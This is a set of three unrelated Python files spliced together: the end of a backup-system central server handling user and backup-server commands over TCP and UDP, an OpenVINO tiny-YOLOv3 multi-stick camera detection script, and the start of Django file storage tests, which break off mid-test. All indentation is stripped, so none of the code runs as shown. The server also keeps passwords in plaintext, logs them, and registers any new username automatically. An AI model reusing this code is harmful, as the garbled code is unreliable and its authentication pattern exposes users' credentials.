my_socket.sendall("ERR\n".encode())
# Code to deal with queries from BS (UDP server)
def deal_with_udp(udp_socket, known_bs):
def signal_handler(_signum, _frame):
udp_socket.close()
exit(0)
# ignore CTRL-C; handle .terminate() from parent
signal(SIGINT, SIG_IGN)
signal(SIGTERM, signal_handler)
while True:
response, address = udp_socket.recvfrom(32)
args = response.decode().split(" ")
command = args[0]
args = args[1:]
if command == "REG":
add_bs(known_bs, args, udp_socket, address)
elif command == "UNR":
remove_bs(known_bs, args, udp_socket, address)
else:
unexpected_command(udp_socket)
def add_bs(known_bs, args, udp_socket, address):
status = "ERR"
ip_bs = args[0]
port_bs = args[1].split("\n")[0]
if len(args) != 2 or port_bs.isdigit() is False:
print("Error in arguments received from BS server: {} {}".format(ip_bs, port_bs))
elif (ip_bs, port_bs) in known_bs:
print("Error: Already added BS {}".format(ip_bs))
status = "NOK"
else:
known_bs[(ip_bs, port_bs)] = 0
backup_dict_to_file(known_bs, CS_KNOWN_BS_SAVEFILE)
status = "OK"
print("-> BS added:\n - ip: {}\n - port: {}\n".format(ip_bs, port_bs))
udp_socket.sendto("RGR {}\n".format(status).encode(), address)
def remove_bs(known_bs, args, udp_socket, address):
status = "ERR\n"
ip_bs = args[0]
port_bs = args[1].split("\n")[0]
if len(args) != 2 or port_bs.isdigit() is False:
print("Error in arguments received from BS server: {} {}".format(ip_bs, port_bs))
elif (ip_bs, port_bs) not in known_bs:
print("Error: User {} does not exist".format(ip_bs))
status = "NOK\n"
else:
del known_bs[(ip_bs, port_bs)]
backup_dict_to_file(known_bs, CS_KNOWN_BS_SAVEFILE)
status = "OK\n"
print("-> BS removed:\n - ip: {}\n - port: {}\n".format(ip_bs, port_bs))
udp_socket.sendto("UAR {}\n".format(status).encode(), address)
def deal_with_tcp(tcp_socket, valid_users, dirs_location, known_bs):
def signal_handler(_signum, _frame):
tcp_socket.close()
exit(0)
def deal_with_client(client, valid_users, dirs_location, known_bs):
""" Code / function for forked worker """
conn = client[0]
logged_in = False # this var is False or contains the user id
while True:
try:
command = read_bytes_until(conn, " \n")
if command == "AUT":
logged_in, password = authenticate_user(valid_users, conn)
elif command == "DLU" and logged_in:
delete_user(logged_in, conn, dirs_location, valid_users)
break
elif command == "BCK" and logged_in:
backup_dir(logged_in, conn, known_bs, password, dirs_location)
break
elif command == "RST" and logged_in:
restore_dir(logged_in, conn, dirs_location)
break
elif command == "LSD" and logged_in:
list_user_dirs(logged_in, conn, dirs_location)
break
elif command == "LSF" and logged_in:
list_files_in_dir(logged_in, conn, dirs_location)
break
elif command == "DEL" and logged_in:
delete_dir(logged_in, conn, dirs_location)
break
else:
unexpected_command(conn)
except (BrokenPipeError, ConnectionResetError):
print("{}: connection closed\n".format(client[1]))
exit(0)
conn.close() # end of code
# Mask CTRL-C, handle SIGTERM (terminate, from father)
signal(SIGINT, SIG_IGN)
signal(SIGTERM, signal_handler)
while True:
client = tcp_socket.accept()
p_client = Process(target=deal_with_client, args=(client, valid_users, dirs_location, known_bs), daemon=True)
p_client.start()
def authenticate_user(valid_users, conn):
""" Authenticates user, returns (user,pass) (AUT/AUR) """
username = read_bytes_until(conn, " ")
password = read_bytes_until(conn, "\n")
print("-> AUT {} {}".format(username, password))
res = (False, False)
status = "NOK"
if username not in valid_users:
valid_users[username] = password
backup_dict_to_file(valid_users, CS_VALID_USERS_SAVEFILE)
res = (username, password)
status = "NEW"
print("New user: {}".format(username))
elif valid_users[username] != password:
print("Password received does not match")
else:
res = (username, password)
status = "OK"
print("User {} logged in sucessfully".format(username))
response = "AUR {}\n".format(status)
conn.sendall(response.encode())
return res
def delete_user(username, conn, dirs_location, valid_users):
print(">> DLU")
status = "NOK\n"
if username in [f[0] for f in dict(dirs_location)]:
print("There is still information stored for user\n")
else:
del valid_users[username]
backup_dict_to_file(valid_users, CS_VALID_USERS_SAVEFILE)
status = "OK\n"
print("User {} deleted sucessfully\n".format(username))
response = "DLR " + status
conn.sendall(response.encode())
def backup_dir(username, conn, known_bs, password, dirs_location):
flag = 0
folder = read_bytes_until(conn, " ")
nr_user_files = int(read_bytes_until(conn, " "))
print(">> BCK {} {}".format(folder, str(nr_user_files)))
user_dict = {} # {"filename": [date, time, size]}
bs_dict = {} # {"filename": [date, time, size]}
string_of_files = ""
registered_in_bs = 0
files_user = read_bytes_until(conn, "\n").split()
for i in range(nr_user_files):
filename = files_user[4*i]
date = files_user[4*i+1]
time = files_user[4*i+2]
size = files_user[4*i+3]
user_dict[filename] = [date, time, size]
string_of_files += " {} {} {} {}".format(filename, date, time, size)
if (username, folder) in dirs_location:
flag = 1
ip_bs = dirs_location[(username, folder)][0]
port_bs = dirs_location[(username, folder)][1]
print("BCK {} {} {} {}".format(username, folder, ip_bs, port_bs))
bs_socket = udp_client(ip_bs, int(port_bs))
bs_socket.sendall("LSF {} {}\n".format(username, folder).encode())
response = bs_socket.recv(2048).decode().split()
bs_socket.close()
command = response[0]
if command != "LFD":
print("Error in command")
exit(0)
nr_bs_files = int(response[1])
for i in range(nr_bs_files):
filename = response[2 + 4*i]
date = response[2 + 4*i + 1]
time = response[2 + 4*i + 2]
size = response[2 + 4*i + 3]
bs_dict[filename] = [date, time, size]
final_string_of_files = ""
nr_files_final = 0
for user_file in user_dict:
for bs_file in bs_dict:
if user_file == bs_file and user_dict[user_file] != bs_dict[bs_file]:
final_string_of_files += " {} {} {} {}".format(user_file, bs_dict[user_file][0], bs_dict[user_file][1], bs_dict[user_file][2])
nr_files_final += 1
if nr_files_final == 0:
print("No files to backup\n")
response = "BKR {} {} {}{}\n".format(ip_bs, port_bs, nr_files_final, final_string_of_files)
conn.sendall(response.encode())
if flag == 0:
ip_bs = ""
flag_bs = 0
flag_first_user = 1
first_user = ()
if not known_bs:
print("No BS available to backup [BKR EOF]\n")
conn.sendall("BKR EOF\n".encode())
return
known_bs_temp = dict(known_bs)
for (ip, port) in known_bs_temp:
'''verifica se e a primeira chave do dicionario
Se for, guarda caso os BS ja tenham sido usados para backup
o mesmo numero de vezes'''
if flag_first_user:
ip_bs, port_bs = (ip, port)
flag_first_user = 0
elif known_bs_temp[(ip, port)] < known_bs_temp[(ip_bs, port_bs)]:
ip_bs, port_bs = (ip, port)
known_bs[(ip_bs, port_bs)] += 1
print("BS with ip: {} and port: {} was chosen for backup".format(ip_bs, port_bs))
for (user, directory) in dict(dirs_location):
if dirs_location[(user, directory)] == (ip_bs, port_bs) and user == username:
print("User {} is already registered in BS with ip: {} and port: {}\n".format(username, ip_bs, port_bs))
registered_in_bs = 1
break
dirs_location[(username, folder)] = (ip_bs, port_bs)
backup_dict_to_file(dirs_location, CS_DIRS_LOCATION_SAVEFILE)
if not registered_in_bs:
bs_socket = udp_client(ip_bs, int(port_bs))
response = "LSU {} {}\n".format(username, password)
bs_socket.sendall(response.encode())
command, status = bs_socket.recv(32).decode()[:-1].split()
bs_socket.close()
if command != "LUR":
print("Error in command\n")
exit(0)
elif status == "NOK\n":
print("Already knew user\n")
exit(0)
elif status == "ERR\n":
print("Error in arguments sent from CS to BS\n")
exit(0)
else:
print("User {} was added to BS with ip: {} and port: {} sucessfully\n".format(username, ip_bs, port_bs))
response = "BKR {} {} {}{}\n".format(ip_bs, port_bs, nr_user_files, string_of_files)
conn.sendall(response.encode())
#check conditions of error
def restore_dir(username, conn, dirs_location):
flag = 0
folder = read_bytes_until(conn, "\n")
print("Restore {}".format(folder))
if (username, folder) in dirs_location:
print("Entered")
flag = 1
ip_bs = dirs_location[(username, folder)][0]
port_bs = dirs_location[(username, folder)][1]
response = "RSR {} {}\n".format(ip_bs, port_bs)
print(response)
conn.sendall(response.encode())
if flag == 0:
print("RSR EOF")
response = "RSR EOF\n"
conn.sendall(response.encode())
def list_user_dirs(username, conn, dirs_location):
print(">> LSD")
nr_files = 0
dirs_str = ""
if dirs_location:
for (user, folder) in dict(dirs_location):
if user == username:
nr_files += 1
dirs_str += folder + " "
print(folder)
response = "LDR {} {}\n".format(str(nr_files), dirs_str)
print(response)
conn.sendall(response.encode())
def list_files_in_dir(username, conn, dirs_location):
flag = 0
folder = read_bytes_until(conn, " \n")
print(">> LSF {}".format(folder))
if (username, folder) in dirs_location:
flag = 1
ip_bs = dirs_location[(username, folder)][0]
port_bs = dirs_location[(username, folder)][1]
bs_socket = udp_client(ip_bs, int(port_bs))
bs_socket.sendall("LSF {} {}\n".format(username, folder).encode())
response = bs_socket.recv(2048).decode().split()
bs_socket.close()
if response[0] != "LFD":
print("Error in command\n")
exit(0)
nr_bs_files = int(response[1])
conn.sendall("LFD {} {} {}".format(ip_bs, port_bs, nr_bs_files).encode())
for i in range(nr_bs_files):
filename = response[2 + 4*i]
date = response[2 + 4*i + 1]
time = response[2 + 4*i + 2]
size = response[2 + 4*i + 3]
conn.sendall(" {} {} {} {}".format(filename, date, time, size).encode())
conn.sendall("\n".encode())
if flag == 0:
response = "LFD NOK\n"
conn.sendall(response.encode())
def delete_dir(username, conn, dirs_location):
print(">> DEL")
status_del = "NOK"
flag = 0
folder = read_bytes_until(conn, " \n")
if (username, folder) in dirs_location:
flag = 1
ip_bs = dirs_location[(username, folder)][0]
port_bs = dirs_location[(username, folder)][1]
bs_socket = udp_client(ip_bs, int(port_bs))
bs_socket.sendall("DLB {} {}\n".format(username, folder).encode())
command, status = bs_socket.recv(8).decode().split(" ")
bs_socket.close()
if command != "DBR":
print("Error in protocol\n")
conn.sendall("ERR\n".encode())
else:
if status == "NOK":
print("No such folder exists in the chosen BS\n")
else:
status_del = "OK"
del dirs_location[(username, folder)]
backup_dict_to_file(dirs_location, CS_DIRS_LOCATION_SAVEFILE)
print("Directory {} was sucessfully deleted\n".format(folder))
response = "DDR {}\n".format(status_del)
conn.sendall(response.encode())
if flag == 0:
print("No such folder for the user {}\n".format(username))
response = "DDR {}\n".format(status_del)
conn.sendall(response.encode())
def main():
manager = SyncManager()
manager.start(ignore_sigint)
known_bs = manager.dict() # {("ip_BS", "port_BS"): counter}
valid_users = manager.dict() # {"user": password}
dirs_location = manager.dict() # {(username, "folder"): (ipBS, portBS)}
my_address = get_best_ip()
my_port = DEFAULT_CS_PORT
try:
a = getopt.getopt(sys.argv[1:], "p:")[0]
except getopt.GetoptError as error:
print(error)
exit(2)
for opt, arg in a:
if opt == '-p':
my_port = int(arg)
print("My address is {}\n".format(my_address))
udp_receiver = udp_server(my_address, my_port)
tcp_receiver = tcp_server(my_address, my_port)
if os.path.isfile(CS_KNOWN_BS_SAVEFILE):
known_bs.update(restore_dict_from_file(CS_KNOWN_BS_SAVEFILE))
if os.path.isfile(CS_VALID_USERS_SAVEFILE):
valid_users.update(restore_dict_from_file(CS_VALID_USERS_SAVEFILE))
if os.path.isfile(CS_DIRS_LOCATION_SAVEFILE):
dirs_location.update(restore_dict_from_file(CS_DIRS_LOCATION_SAVEFILE))
try:
# "Forking"
p_udp = Process(target=deal_with_udp, args=(udp_receiver, known_bs))
p_tcp = Process(target=deal_with_tcp, args=(tcp_receiver, valid_users, dirs_location, known_bs))
p_udp.start()
p_tcp.start()
pause()
except KeyboardInterrupt:
pass
finally:
tcp_receiver.close()
udp_receiver.close()
p_tcp.terminate()
p_udp.terminate()
p_tcp.join()
p_udp.join()
backup_dict_to_file(known_bs, CS_KNOWN_BS_SAVEFILE)
backup_dict_to_file(valid_users, CS_VALID_USERS_SAVEFILE)
backup_dict_to_file(dirs_location, CS_DIRS_LOCATION_SAVEFILE)
print()
if __name__ == '__main__':
main()
|
openvino_tiny-yolov3_MultiStick_test.py | import sys, os, cv2, time, heapq, argparse
import numpy as np, math
try:
from armv7l.openvino.inference_engine import IENetwork, IEPlugin
except:
from openvino.inference_engine import IENetwork, IEPlugin
import multiprocessing as mp
from time import sleep
import threading
yolo_scale_13 = 13
yolo_scale_26 = 26
yolo_scale_52 = 52
classes = 80
coords = 4
num = 3
anchors = [10,14, 23,27, 37,58, 81,82, 135,169, 344,319]
LABELS = ("person", "bicycle", "car", "motorbike", "aeroplane",
"bus", "train", "truck", "boat", "traffic light",
"fire hydrant", "stop sign", "parking meter", "bench", "bird",
"cat", "dog", "horse", "sheep", "cow",
"elephant", "bear", "zebra", "giraffe", "backpack",
"umbrella", "handbag", "tie", "suitcase", "frisbee",
"skis", "snowboard", "sports ball", "kite", "baseball bat",
"baseball glove", "skateboard", "surfboard","tennis racket", "bottle",
"wine glass", "cup", "fork", "knife", "spoon",
"bowl", "banana", "apple", "sandwich", "orange",
"broccoli", "carrot", "hot dog", "pizza", "donut",
"cake", "chair", "sofa", "pottedplant", "bed",
"diningtable", "toilet", "tvmonitor", "laptop", "mouse",
"remote", "keyboard", "cell phone", "microwave", "oven",
"toaster", "sink", "refrigerator", "book", "clock",
"vase", "scissors", "teddy bear", "hair drier", "toothbrush")
label_text_color = (255, 255, 255)
label_background_color = (125, 175, 75)
box_color = (255, 128, 0)
box_thickness = 1
processes = []
fps = ""
detectfps = ""
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
lastresults = None
def EntryIndex(side, lcoords, lclasses, location, entry):
n = int(location / (side * side))
loc = location % (side * side)
return int(n * side * side * (lcoords + lclasses + 1) + entry * side * side + loc)
class DetectionObject():
xmin = 0
ymin = 0
xmax = 0
ymax = 0
class_id = 0
confidence = 0.0
def __init__(self, x, y, h, w, class_id, confidence, h_scale, w_scale):
self.xmin = int((x - w / 2) * w_scale)
self.ymin = int((y - h / 2) * h_scale)
self.xmax = int(self.xmin + w * w_scale)
self.ymax = int(self.ymin + h * h_scale)
self.class_id = class_id
self.confidence = confidence
def IntersectionOverUnion(box_1, box_2):
width_of_overlap_area = min(box_1.xmax, box_2.xmax) - max(box_1.xmin, box_2.xmin)
height_of_overlap_area = min(box_1.ymax, box_2.ymax) - max(box_1.ymin, box_2.ymin)
area_of_overlap = 0.0
if (width_of_overlap_area < 0.0 or height_of_overlap_area < 0.0):
area_of_overlap = 0.0
else:
area_of_overlap = width_of_overlap_area * height_of_overlap_area
box_1_area = (box_1.ymax - box_1.ymin) * (box_1.xmax - box_1.xmin)
box_2_area = (box_2.ymax - box_2.ymin) * (box_2.xmax - box_2.xmin)
area_of_union = box_1_area + box_2_area - area_of_overlap
retval = 0.0
if area_of_union <= 0.0:
retval = 0.0
else:
retval = (area_of_overlap / area_of_union)
return retval
def ParseYOLOV3Output(blob, resized_im_h, resized_im_w, original_im_h, original_im_w, threshold, objects):
out_blob_h = blob.shape[2]
out_blob_w = blob.shape[3]
side = out_blob_h
anchor_offset = 0
if side == yolo_scale_13:
anchor_offset = 2 * 3
elif side == yolo_scale_26:
anchor_offset = 2 * 0
side_square = side * side
output_blob = blob.flatten()
for i in range(side_square):
row = int(i / side)
col = int(i % side)
for n in range(num):
obj_index = EntryIndex(side, coords, classes, n * side * side + i, coords)
box_index = EntryIndex(side, coords, classes, n * side * side + i, 0)
scale = output_blob[obj_index]
if (scale < threshold):
continue
x = (col + output_blob[box_index + 0 * side_square]) / side * resized_im_w
y = (row + output_blob[box_index + 1 * side_square]) / side * resized_im_h
height = math.exp(output_blob[box_index + 3 * side_square]) * anchors[anchor_offset + 2 * n + 1]
width = math.exp(output_blob[box_index + 2 * side_square]) * anchors[anchor_offset + 2 * n]
for j in range(classes):
class_index = EntryIndex(side, coords, classes, n * side_square + i, coords + 1 + j)
prob = scale * output_blob[class_index]
if prob < threshold:
continue
obj = DetectionObject(x, y, height, width, j, prob, (original_im_h / resized_im_h), (original_im_w / resized_im_w))
objects.append(obj)
return objects
def camThread(LABELS, results, frameBuffer, camera_width, camera_height, vidfps):
global fps
global detectfps
global lastresults
global framecount
global detectframecount
global time1
global time2
global cam
global window_name
cam = cv2.VideoCapture(0)
if cam.isOpened() != True:
print("USB Camera Open Error!!!")
sys.exit(0)
cam.set(cv2.CAP_PROP_FPS, vidfps)
cam.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
window_name = "USB Camera"
wait_key_time = 1
#cam = cv2.VideoCapture("data/input/testvideo4.mp4")
#camera_width = int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))
#camera_height = int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))
#frame_count = int(cam.get(cv2.CAP_PROP_FRAME_COUNT))
#window_name = "Movie File"
#wait_key_time = int(1000 / vidfps)
cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)
while True:
t1 = time.perf_counter()
# USB Camera Stream Read
s, color_image = cam.read()
if not s:
continue
if frameBuffer.full():
frameBuffer.get()
height = color_image.shape[0]
width = color_image.shape[1]
frameBuffer.put(color_image.copy())
if not results.empty():
objects = results.get(False)
detectframecount += 1
for obj in objects:
if obj.confidence < 0.2:
continue
label = obj.class_id
confidence = obj.confidence
if confidence > 0.2:
label_text = LABELS[label] + " (" + "{:.1f}".format(confidence * 100) + "%)"
cv2.rectangle(color_image, (obj.xmin, obj.ymin), (obj.xmax, obj.ymax), box_color, box_thickness)
cv2.putText(color_image, label_text, (obj.xmin, obj.ymin - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, label_text_color, 1)
lastresults = objects
else:
if not isinstance(lastresults, type(None)):
for obj in lastresults:
if obj.confidence < 0.2:
continue
label = obj.class_id
confidence = obj.confidence
if confidence > 0.2:
label_text = LABELS[label] + " (" + "{:.1f}".format(confidence * 100) + "%)"
cv2.rectangle(color_image, (obj.xmin, obj.ymin), (obj.xmax, obj.ymax), box_color, box_thickness)
cv2.putText(color_image, label_text, (obj.xmin, obj.ymin - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, label_text_color, 1)
cv2.putText(color_image, fps, (width-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.putText(color_image, detectfps, (width-170,30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.imshow(window_name, cv2.resize(color_image, (width, height)))
if cv2.waitKey(wait_key_time)&0xFF == ord('q'):
sys.exit(0)
## Print FPS
framecount += 1
if framecount >= 15:
fps = "(Playback) {:.1f} FPS".format(time1/15)
detectfps = "(Detection) {:.1f} FPS".format(detectframecount/time2)
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
t2 = time.perf_counter()
elapsedTime = t2-t1
time1 += 1/elapsedTime
time2 += elapsedTime
# l = Search list
# x = Search target value
def searchlist(l, x, notfoundvalue=-1):
if x in l:
return l.index(x)
else:
return notfoundvalue
def async_infer(ncsworker):
#ncsworker.skip_frame_measurement()
while True:
ncsworker.predict_async()
class NcsWorker(object):
def __init__(self, devid, frameBuffer, results, camera_width, camera_height, number_of_ncs, vidfps):
self.devid = devid
self.frameBuffer = frameBuffer
self.model_xml = "./lrmodels/tiny-YoloV3/FP16/frozen_tiny_yolo_v3.xml"
self.model_bin = "./lrmodels/tiny-YoloV3/FP16/frozen_tiny_yolo_v3.bin"
self.camera_width = camera_width
self.camera_height = camera_height
self.m_input_size = 416
self.threshould = 0.4
self.num_requests = 4
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
self.plugin = IEPlugin(device="MYRIAD")
self.net = IENetwork(model=self.model_xml, weights=self.model_bin)
self.input_blob = next(iter(self.net.inputs))
self.exec_net = self.plugin.load(network=self.net, num_requests=self.num_requests)
self.results = results
self.number_of_ncs = number_of_ncs
self.predict_async_time = 800
self.skip_frame = 0
self.roop_frame = 0
self.vidfps = vidfps
self.new_w = int(camera_width * self.m_input_size/camera_width)
self.new_h = int(camera_height * self.m_input_size/camera_height)
def image_preprocessing(self, color_image):
resized_image = cv2.resize(color_image, (self.new_w, self.new_h), interpolation = cv2.INTER_CUBIC)
canvas = np.full((self.m_input_size, self.m_input_size, 3), 128)
canvas[(self.m_input_size-self.new_h)//2:(self.m_input_size-self.new_h)//2 + self.new_h,(self.m_input_size-self.new_w)//2:(self.m_input_size-self.new_w)//2 + self.new_w, :] = resized_image
prepimg = canvas
prepimg = prepimg[np.newaxis, :, :, :] # Batch size axis add
prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW
return prepimg
def skip_frame_measurement(self):
surplustime_per_second = (1000 - self.predict_async_time)
if surplustime_per_second > 0.0:
frame_per_millisecond = (1000 / self.vidfps)
total_skip_frame = surplustime_per_second / frame_per_millisecond
self.skip_frame = int(total_skip_frame / self.num_requests)
else:
self.skip_frame = 0
def predict_async(self):
try:
if self.frameBuffer.empty():
return
self.roop_frame += 1
if self.roop_frame <= self.skip_frame:
self.frameBuffer.get()
return
self.roop_frame = 0
prepimg = self.image_preprocessing(self.frameBuffer.get())
reqnum = searchlist(self.inferred_request, 0)
if reqnum > -1:
self.exec_net.start_async(request_id=reqnum, inputs={self.input_blob: prepimg})
self.inferred_request[reqnum] = 1
self.inferred_cnt += 1
if self.inferred_cnt == sys.maxsize:
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
heapq.heappush(self.heap_request, (self.inferred_cnt, reqnum))
cnt, dev = heapq.heappop(self.heap_request)
if self.exec_net.requests[dev].wait(0) == 0:
self.exec_net.requests[dev].wait(-1)
objects = []
outputs = self.exec_net.requests[dev].outputs
for output in outputs.values():
objects = ParseYOLOV3Output(output, self.new_h, self.new_w, self.camera_height, self.camera_width, self.threshould, objects)
objlen = len(objects)
for i in range(objlen):
if (objects[i].confidence == 0.0):
continue
for j in range(i + 1, objlen):
if (IntersectionOverUnion(objects[i], objects[j]) >= 0.4):
if objects[i].confidence < objects[j].confidence:
objects[i], objects[j] = objects[j], objects[i]
objects[j].confidence = 0.0
self.results.put(objects)
self.inferred_request[dev] = 0
else:
heapq.heappush(self.heap_request, (cnt, dev))
except:
import traceback
traceback.print_exc()
def inferencer(results, frameBuffer, number_of_ncs, camera_width, camera_height, vidfps):
# Init infer threads
threads = []
for devid in range(number_of_ncs):
thworker = threading.Thread(target=async_infer, args=(NcsWorker(devid, frameBuffer, results, camera_width, camera_height, number_of_ncs, vidfps),))
thworker.start()
threads.append(thworker)
for th in threads:
th.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-numncs','--numberofncs',dest='number_of_ncs',type=int,default=1,help='Number of NCS. (Default=1)')
args = parser.parse_args()
number_of_ncs = args.number_of_ncs
camera_width = int(cv2.VideoCapture(0).get(cv2.CAP_PROP_FRAME_WIDTH))
camera_height = int(cv2.VideoCapture(0).get(cv2.CAP_PROP_FRAME_HEIGHT))
vidfps = 30
try:
mp.set_start_method('forkserver')
frameBuffer = mp.Queue(10)
results = mp.Queue()
# Start detection MultiStick
# Activation of inferencer
p = mp.Process(target=inferencer, args=(results, frameBuffer, number_of_ncs, camera_width, camera_height, vidfps), daemon=True)
p.start()
processes.append(p)
sleep(number_of_ncs * 7)
# Start streaming
p = mp.Process(target=camThread, args=(LABELS, results, frameBuffer, camera_width, camera_height, vidfps), daemon=True)
p.start()
processes.append(p)
while True:
sleep(1)
except:
import traceback
traceback.print_exc()
finally:
for p in range(len(processes)):
processes[p].terminate()
print("\n\nFinished\n\n")
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonexistentStorage')
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonexistentStorage')
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, tuple())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
